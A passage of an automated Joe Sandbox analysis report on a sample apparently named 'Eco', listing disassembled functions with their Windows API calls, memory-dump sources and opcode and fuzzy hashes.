                          • Opcode Fuzzy Hash: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                          • Instruction Fuzzy Hash: 4F514AB5A00209AFDB14CF58D884AAABBB8FF5D314F15856AE959DB340D730E911CFA0
                          APIs
                          • _memset.LIBCMT ref: 0057286B
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005728B6
                          • IsMenu.USER32(00000000), ref: 005728D6
                          • CreatePopupMenu.USER32 ref: 0057290A
                          • GetMenuItemCount.USER32(000000FF), ref: 00572968
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00572999
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          • Opcode ID: 96dbc34cf48bb2329a6853179f8cba9853f1ae8952c03263bd966d57189ce367
                          • Instruction ID: 284c44105e8887b80906fc20275a2a139e05203b76725c0cca215a7da21f59cf
                          • Opcode Fuzzy Hash: 96dbc34cf48bb2329a6853179f8cba9853f1ae8952c03263bd966d57189ce367
                          • Instruction Fuzzy Hash: B051CF30A0020ADFDF24CF68E888BAEBFF5FF55314F188519E95997290D3709984EB61
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00511B76
                          • GetWindowRect.USER32(?,?), ref: 00511BDA
                          • ScreenToClient.USER32(?,?), ref: 00511BF7
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00511C08
                          • EndPaint.USER32(?,?), ref: 00511C52
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                          • String ID:
                          • API String ID: 1827037458-0
                          • Opcode ID: ff6f75ee3f569e518993ee4ab2952b82742431547e9ecb78e80ee07c1fe9116b
                          • Instruction ID: bc07b956c40bd893c0e840fd44583adaed3c7f3f989dce6dbe727e66b38a1455
                          • Opcode Fuzzy Hash: ff6f75ee3f569e518993ee4ab2952b82742431547e9ecb78e80ee07c1fe9116b
                          • Instruction Fuzzy Hash: 8D418F701046019FE720DF24DC88BA67FF8FB59324F1406AAFA55872A1C7319889EB66
                          APIs
                          • ShowWindow.USER32(005D67B0,00000000,01235480,?,?,005D67B0,?,0059B995,?,?), ref: 0059BAFF
                          • EnableWindow.USER32(?,00000000), ref: 0059BB23
                          • ShowWindow.USER32(005D67B0,00000000,01235480,?,?,005D67B0,?,0059B995,?,?), ref: 0059BB83
                          • ShowWindow.USER32(?,00000004,?,0059B995,?,?), ref: 0059BB95
                          • EnableWindow.USER32(?,00000001), ref: 0059BBB9
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0059BBDC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                          • Instruction ID: 37f14a1cdd114e1d2488009aef14cbea12252ed78b4477b0c91b68c15d60021e
                          • Opcode Fuzzy Hash: eff0b489ca909e11c7cbd98ed11b5d39f4ae47515a87109c6faa51b2a29d1d55
                          • Instruction Fuzzy Hash: CB414F34600154AFFF25CF24D989BA47FE2FB16314F1881B9EA498F2E6C731A845CB51
                          APIs
                          • GetForegroundWindow.USER32(?,?,?,?,?,?,005852F1,?,?,00000000,00000001), ref: 0058755B
                            • Part of subcall function 00583E50: GetWindowRect.USER32(?,?), ref: 00583E63
                          • GetDesktopWindow.USER32 ref: 00587585
                          • GetWindowRect.USER32(00000000), ref: 0058758C
                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 005875BE
                            • Part of subcall function 0057566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005756E4
                          • GetCursorPos.USER32(?), ref: 005875EA
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00587648
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                          • String ID:
                          • API String ID: 4137160315-0
                          • Opcode ID: 08adaad2eb382f3aa0e76b45f6bc01620d2948ccf46d0eefa4bd4871a69de7be
                          • Instruction ID: 4a262c49fd81da32441545ac9d3e5aee8b0ef0dbe8a6c7ff6518da21dd012706
                          • Opcode Fuzzy Hash: 08adaad2eb382f3aa0e76b45f6bc01620d2948ccf46d0eefa4bd4871a69de7be
                          • Instruction Fuzzy Hash: F531C672504309ABD720EF14DC49F5BBBE9FF89314F100919F989A7191DB70EA58CB92
                          APIs
                            • Part of subcall function 00568AAA: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00568AC1
                            • Part of subcall function 00568AAA: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00568ACB
                            • Part of subcall function 00568AAA: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00568ADA
                            • Part of subcall function 00568AAA: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00568AE1
                            • Part of subcall function 00568AAA: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00568AF7
                          • GetLengthSid.ADVAPI32(?,00000000,00568E30), ref: 00569265
                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00569271
                          • HeapAlloc.KERNEL32(00000000), ref: 00569278
                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00569291
                          • GetProcessHeap.KERNEL32(00000000,00000000,00568E30), ref: 005692A5
                          • HeapFree.KERNEL32(00000000), ref: 005692AC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                          • String ID:
                          • API String ID: 3008561057-0
                          • Opcode ID: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                          • Instruction ID: 27fcdff7ccb8eceb35638689d9a22eed4cae02a157d92ff8cb31a9b556aad384
                          • Opcode Fuzzy Hash: 0790b98ce4d4b528f81516d1bc8fd3bb14b9c6eb8ad08b3ee56559ab6b52b8df
                          • Instruction Fuzzy Hash: 5911EB36610205FFDB108FA4CC18FBE7BACFB42315F508019F845A3250C732A944EB20
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00568FE3
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00568FEA
                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00568FF9
                          • CloseHandle.KERNEL32(00000004), ref: 00569004
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00569033
                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00569047
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                          • Instruction ID: d82be53a025735641c1f520e9a6d130517add579cd7af13a7f69c9a71b5a11c0
                          • Opcode Fuzzy Hash: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                          • Instruction Fuzzy Hash: 07115972501249ABDF118F94ED49FEE7BA9FF09714F044155FE04A21A0C3769E64EB60
                          APIs
                          • GetDC.USER32(00000000), ref: 0056C131
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0056C142
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0056C149
                          • ReleaseDC.USER32(00000000,00000000), ref: 0056C151
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0056C168
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0056C17A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                          • Instruction ID: 2e274e22ab88007aa01da774edef750715d899da11ff17338cbdf47f026ed2e1
                          • Opcode Fuzzy Hash: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                          • Instruction Fuzzy Hash: 5C018F75E00208BBEB109BE69C49A5EBFB8EB59351F004066FA08A7281D6309D14DFA0
                          APIs
                            • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                            • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0059C2F7
                          • LineTo.GDI32(00000000,00000003,?), ref: 0059C30B
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C319
                          • LineTo.GDI32(00000000,00000000,?), ref: 0059C329
                          • EndPath.GDI32(00000000), ref: 0059C339
                          • StrokePath.GDI32(00000000), ref: 0059C349
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 17b51d2a8e3f6ef1720eb5ed0443034d6e36b193f176e2a865e00915cf6bfcb4
                          • Instruction ID: c324163767fe14bb5cb39eed0b85964a8df6e7bbe75ba6b9ac01ab62e4298924
                          • Opcode Fuzzy Hash: 17b51d2a8e3f6ef1720eb5ed0443034d6e36b193f176e2a865e00915cf6bfcb4
                          • Instruction Fuzzy Hash: B4111B7600010DBFEF129F94DC88FEA7FADFB19354F048452BA195A1A0C7719D59EBA0
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530717
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0053071F
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 0053072A
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00530735
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 0053073D
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00530745
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                          • Instruction ID: 94e71dc39052b244d4387e6a4cf6fb4ed17ad669a2babd4563eee39437067e52
                          • Opcode Fuzzy Hash: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                          • Instruction Fuzzy Hash: 25016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00575821
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00575837
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00575846
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00575855
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057585F
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00575866
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                          • Instruction ID: 10c527e3a45b86663bd2359418afdc967b6fd33e2ba8cb32f5efdeed96d32485
                          • Opcode Fuzzy Hash: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                          • Instruction Fuzzy Hash: D5F01D32251158BFE7215B92AC0DEEF7A7CEBD7B15F00015AFA0492090D7A01A15A6B5
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 0057766B
                          • EnterCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 0057767C
                          • TerminateThread.KERNEL32(00000000,000001F6,?,0051C2B6,?,?), ref: 00577689
                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0051C2B6,?,?), ref: 00577696
                            • Part of subcall function 0057705D: CloseHandle.KERNEL32(00000000,?,005776A3,?,0051C2B6,?,?), ref: 00577067
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 005776A9
                          • LeaveCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 005776B0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                          • Instruction ID: e4d49b0a4263e17b9deb62ef144c05088bfedaaba06d3c9463d37a7e145a2256
                          • Opcode Fuzzy Hash: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                          • Instruction Fuzzy Hash: A7F05E36155711ABD7112B68FC8CEEB7B39FF5A302F145422F602910E4CB759819EB60
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00569338
                          • UnloadUserProfile.USERENV(?,?), ref: 00569344
                          • CloseHandle.KERNEL32(?), ref: 0056934D
                          • CloseHandle.KERNEL32(?), ref: 00569355
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0056935E
                          • HeapFree.KERNEL32(00000000), ref: 00569365
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                          • Instruction ID: e5f0069338f8e7d8436b5e557d69dd47a9f5dc99953db70d22223e123934cbdd
                          • Opcode Fuzzy Hash: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                          • Instruction Fuzzy Hash: 1BE0E536114101BFDB011FE1EC0C99ABF39FF6A722B105621F215810B0CB72A469EF90
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00588AC5
                          • CharUpperBuffW.USER32(?,?), ref: 00588BD4
                          • VariantClear.OLEAUT32(?), ref: 00588D4C
                            • Part of subcall function 0057798A: VariantInit.OLEAUT32(00000000), ref: 005779CA
                            • Part of subcall function 0057798A: VariantCopy.OLEAUT32(00000000,?), ref: 005779D3
                            • Part of subcall function 0057798A: VariantClear.OLEAUT32(00000000), ref: 005779DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: db6f83b448ef7bb8a72c8f919b1d695a7613d8f0e2ce59f9c4fccb426c517736
                          • Instruction ID: dc89d025b75b29e6dd6b31f1f69fb150d43e936c2df3492d917b3e6c5944b37b
                          • Opcode Fuzzy Hash: db6f83b448ef7bb8a72c8f919b1d695a7613d8f0e2ce59f9c4fccb426c517736
                          • Instruction Fuzzy Hash: 1D9169746043029FC710EF24C48596ABBE4FFD9314F54896DF88A9B3A1DB31E945CB92
                          APIs
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                          • _memset.LIBCMT ref: 0057319B
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005731CA
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057327D
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005732AB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 4152858687-4108050209
                          • Opcode ID: c638ef20df6c0864ca47c987a3c5cee1810035c94a6faf95c4bcb73f9c8a14f5
                          • Instruction ID: 4dc41ad5ecc7516027179aca44658797a3fdc2108cf9172754d78fe29ff9c727
                          • Opcode Fuzzy Hash: c638ef20df6c0864ca47c987a3c5cee1810035c94a6faf95c4bcb73f9c8a14f5
                          • Instruction Fuzzy Hash: 5651C0756083119AD725DB28E84566B7FE4BF95320F048A2EF889931D2DB30CE44FB92
                          APIs
                          • _memset.LIBCMT ref: 00572DD3
                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00572DEF
                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00572E35
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005D6890,00000000), ref: 00572E7E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: 3050c392a203a50f1a19658304e26147b9634a086e96d8b8a3fccb83df35565f
                          • Instruction ID: 01a4773b3260fde6eb49790fa8fccb1037e88e9dedde24f34ff3de880f5c3935
                          • Opcode Fuzzy Hash: 3050c392a203a50f1a19658304e26147b9634a086e96d8b8a3fccb83df35565f
                          • Instruction Fuzzy Hash: B44182302043029FDB24DF24E888B2ABBE8BF89310F14861DF969973D1D770A905DB62
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DC76
                            • Part of subcall function 00521462: _memmove.LIBCMT ref: 005214B0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                           • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                           • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharLower_memmove
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 3425801089-567219261
